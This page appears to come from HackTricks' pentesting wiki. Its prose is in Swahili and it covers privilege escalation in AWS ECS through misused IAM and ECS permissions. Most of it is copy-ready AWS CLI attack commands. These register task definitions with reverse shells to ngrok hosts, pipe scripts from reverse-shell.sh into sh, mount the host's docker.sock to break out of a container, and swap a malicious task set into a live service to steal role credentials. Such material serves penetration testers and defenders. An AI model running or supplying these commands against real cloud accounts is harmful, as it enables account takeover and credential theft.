AWS - ECS Privesc

Support HackTricks

ECS

More info about ECS in:

AWS - ECS Enum

iam:PassRole, ecs:RegisterTaskDefinition, ecs:RunTask

Mshambuliaji anayekandamiza ruhusa ya iam:PassRole, ecs:RegisterTaskDefinition na ecs:RunTask katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

# Run task definition
aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:eu-west-1:947247140022:cluster/API \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"subnet-e282f9b8\"]}}"

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu tofauti la ECS.

iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask

Kama ilivyo katika mfano wa awali, mshambuliaji anayekandamiza ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:StartTask katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia. Hata hivyo, katika kesi hii, inahitajika kuwa na mfano wa konteina ili kuendesha tafsiri mbaya ya kazi.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn arn:aws:iam::947247140022:role/ecsTaskExecutionRole \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/0.tcp.ngrok.io/14280 0>&1\\\"\"]}]"

aws ecs start-task --task-definition iam_exfiltration \
--container-instances <instance_id>

# Delete task definition
## You need to remove all the versions (:1 is enough if you just created one)
aws ecs deregister-task-definition --task-definition iam_exfiltration:1

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.

iam:PassRole, ecs:RegisterTaskDefinition, (ecs:UpdateService|ecs:CreateService)

Kama ilivyo katika mfano wa awali, mshambuliaji anayekandamiza ruhusa za iam:PassRole, ecs:RegisterTaskDefinition, ecs:UpdateService au ecs:CreateService katika ECS anaweza kuunda tafsiri mpya ya kazi yenye konteina mbaya inayopora akidi za metadata na kuikimbia kwa kuunda huduma mpya yenye angalau kazi 1 inayoendelea.

# Generate task definition with rev shell
aws ecs register-task-definition --family iam_exfiltration \
--task-role-arn  "$ECS_ROLE_ARN" \
--network-mode "awsvpc" \
--cpu 256 --memory 512\
--requires-compatibilities "[\"FARGATE\"]" \
--container-definitions "[{\"name\":\"exfil_creds\",\"image\":\"python:latest\",\"entryPoint\":[\"sh\", \"-c\"],\"command\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/8.tcp.ngrok.io/12378 0>&1\\\"\"]}]"

# Run the task creating a service
aws ecs create-service --service-name exfiltration \
--task-definition iam_exfiltration \
--desired-count 1 \
--cluster "$CLUSTER_ARN" \
--launch-type FARGATE \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"ENABLED\", \"subnets\":[\"$SUBNET\"]}}"

# Run the task updating a service
aws ecs update-service --cluster <CLUSTER NAME> \
--service <SERVICE NAME> \
--task-definition <NEW TASK DEFINITION NAME>

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.

iam:PassRole, (ecs:UpdateService|ecs:CreateService)

Kwa kweli, kwa ruhusa hizo tu inawezekana kutumia overrides kutekeleza amri zisizo na mipaka katika kontena lenye jukumu lolote kwa kutumia kitu kama:

aws ecs run-task \
--task-definition "<task-name>" \
--overrides '{"taskRoleArn":"<role-arn>", "containerOverrides":[{"name":"<container-name-in-task>","command":["/bin/bash","-c","curl https://reverse-shell.sh/6.tcp.eu.ngrok.io:18499 | sh"]}]}' \
--cluster <cluster-name> \
--network-configuration "{\"awsvpcConfiguration\":{\"assignPublicIp\": \"DISABLED\", \"subnets\":[\"<subnet-name>\"]}}"

Madhara Yanayoweza Kutokea: Privesc moja kwa moja kwa jukumu lolote la ECS.

ecs:RegisterTaskDefinition, (ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Hali hii ni kama zile za awali lakini bila ruhusa ya iam:PassRole. Hii bado ni ya kuvutia kwa sababu ikiwa unaweza kuendesha kontena yoyote, hata kama huna jukumu, unaweza kuendesha kontena lenye mamlaka ili kutoroka kwenye node na kuchukua jukumu la EC2 IAM na majukumu mengine ya kontena za ECS yanayoendesha kwenye node. Unaweza hata kulazimisha kazi nyingine kuendesha ndani ya mfano wa EC2 ulioathiriwa ili kuchukua hati zao (kama ilivyojadiliwa katika sehemu ya Privesc kwa node).

Shambulio hili linawezekana tu ikiwa klasta ya ECS inatumia mifano ya EC2 na sio Fargate.

printf '[
{
"name":"exfil_creds",
"image":"python:latest",
"entryPoint":["sh", "-c"],
"command":["/bin/bash -c \\\"bash -i >& /dev/tcp/7.tcp.eu.ngrok.io/12976 0>&1\\\""],
"mountPoints": [
{
"readOnly": false,
"containerPath": "/var/run/docker.sock",
"sourceVolume": "docker-socket"
}
]
}
]' > /tmp/task.json

printf '[
{
"name": "docker-socket",
"host": {
"sourcePath": "/var/run/docker.sock"
}
}
]' > /tmp/volumes.json


aws ecs register-task-definition --family iam_exfiltration \
--cpu 256 --memory 512 \
--requires-compatibilities '["EC2"]' \
--container-definitions file:///tmp/task.json \
--volumes file:///tmp/volumes.json


aws ecs run-task --task-definition iam_exfiltration \
--cluster arn:aws:ecs:us-east-1:947247140022:cluster/ecs-takeover-ecs_takeover_cgidc6fgpq6rpg-cluster \
--launch-type EC2

# You will need to do 'apt update' and 'apt install docker.io' to install docker in the rev shell

ecs:ExecuteCommand, ecs:DescribeTasks,(ecs:RunTask|ecs:StartTask|ecs:UpdateService|ecs:CreateService)

Mshambuliaji mwenye ecs:ExecuteCommand, ecs:DescribeTasks anaweza kutekeleza amri ndani ya kontena linaloendesha na kuhamasisha jukumu la IAM lililounganishwa nalo (unahitaji ruhusa za kuelezea kwa sababu ni muhimu kutekeleza aws ecs execute-command). Hata hivyo, ili kufanya hivyo, kifaa cha kontena kinahitaji kuwa kinaendesha ExecuteCommand agent (ambayo kwa kawaida hakiko).

Kwa hivyo, mshambuliaji anaweza kujaribu:

  • Jaribu kutekeleza amri katika kila kontena linaloendesha

# List enableExecuteCommand on each task
for cluster in $(aws ecs list-clusters | jq .clusterArns | grep '"' | cut -d '"' -f2); do
echo "Cluster $cluster"
for task in $(aws ecs list-tasks --cluster "$cluster" | jq .taskArns | grep '"' | cut -d '"' -f2); do
echo "  Task $task"
# If true, it's your lucky day
aws ecs describe-tasks --cluster "$cluster" --tasks "$task" | grep enableExecuteCommand
done
done

# Execute a shell in a container
aws ecs execute-command --interactive \
--command "sh" \
--cluster "$CLUSTER_ARN" \
--task "$TASK_ARN"
  • Ikiwa ana ecs:RunTask, anza kazi na aws ecs run-task --enable-execute-command [...]

  • Ikiwa ana ecs:StartTask, anza kazi na aws ecs start-task --enable-execute-command [...]

  • Ikiwa ana ecs:CreateService, unda huduma na aws ecs create-service --enable-execute-command [...]

  • Ikiwa ana ecs:UpdateService, sasisha huduma na aws ecs update-service --enable-execute-command [...]

Unaweza kupata mfano wa chaguzi hizo katika sehemu za awali za ECS privesc.

Madhara Yanayoweza Kutokea: Privesc kwa jukumu tofauti lililounganishwa na kontena.

ssm:StartSession

Angalia katika ukurasa wa ssm privesc jinsi unavyoweza kutumia ruhusa hii ili privesc kwa ECS:

AWS - SSM Privesc

iam:PassRole, ec2:RunInstances

Angalia katika ukurasa wa ec2 privesc jinsi unavyoweza kutumia ruhusa hizi ili privesc kwa ECS:

AWS - EC2 Privesc

?ecs:RegisterContainerInstance

TODO: Je, inawezekana kujiandikisha kwa mfano kutoka akaunti tofauti ya AWS ili kazi zifanywe chini ya mashine zinazodhibitiwa na mshambuliaji??

ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, ecs:DescribeTaskSets

TODO: Jaribu hii

Mshambuliaji mwenye ruhusa ecs:CreateTaskSet, ecs:UpdateServicePrimaryTaskSet, na ecs:DescribeTaskSets anaweza kuunda seti ya kazi mbaya kwa huduma iliyopo ya ECS na kusasisha seti ya kazi ya msingi. Hii inamruhusu mshambuliaji kutekeleza msimbo wowote ndani ya huduma.

bashCopy code# Register a task definition with a reverse shell
echo '{
"family": "malicious-task",
"containerDefinitions": [
{
"name": "malicious-container",
"image": "alpine",
"command": [
"sh",
"-c",
"apk add --update curl && curl https://reverse-shell.sh/2.tcp.ngrok.io:14510 | sh"
]
}
]
}' > malicious-task-definition.json

aws ecs register-task-definition --cli-input-json file://malicious-task-definition.json

# Create a malicious task set for the existing service
aws ecs create-task-set --cluster existing-cluster --service existing-service --task-definition malicious-task --network-configuration "awsvpcConfiguration={subnets=[subnet-0e2b3f6c],securityGroups=[sg-0f9a6a76],assignPublicIp=ENABLED}"

# Update the primary task set for the service
aws ecs update-service-primary-task-set --cluster existing-cluster --service existing-service --primary-task-set arn:aws:ecs:region:123456789012:task-set/existing-cluster/existing-service/malicious-task-set-id

Madhara Yanayoweza Kutokea: Teua msimbo wa kawaida katika huduma iliyoathiriwa, ambayo inaweza kuathiri utendaji wake au kuhamasisha data nyeti.

Marejeleo

Support HackTricks

Last updated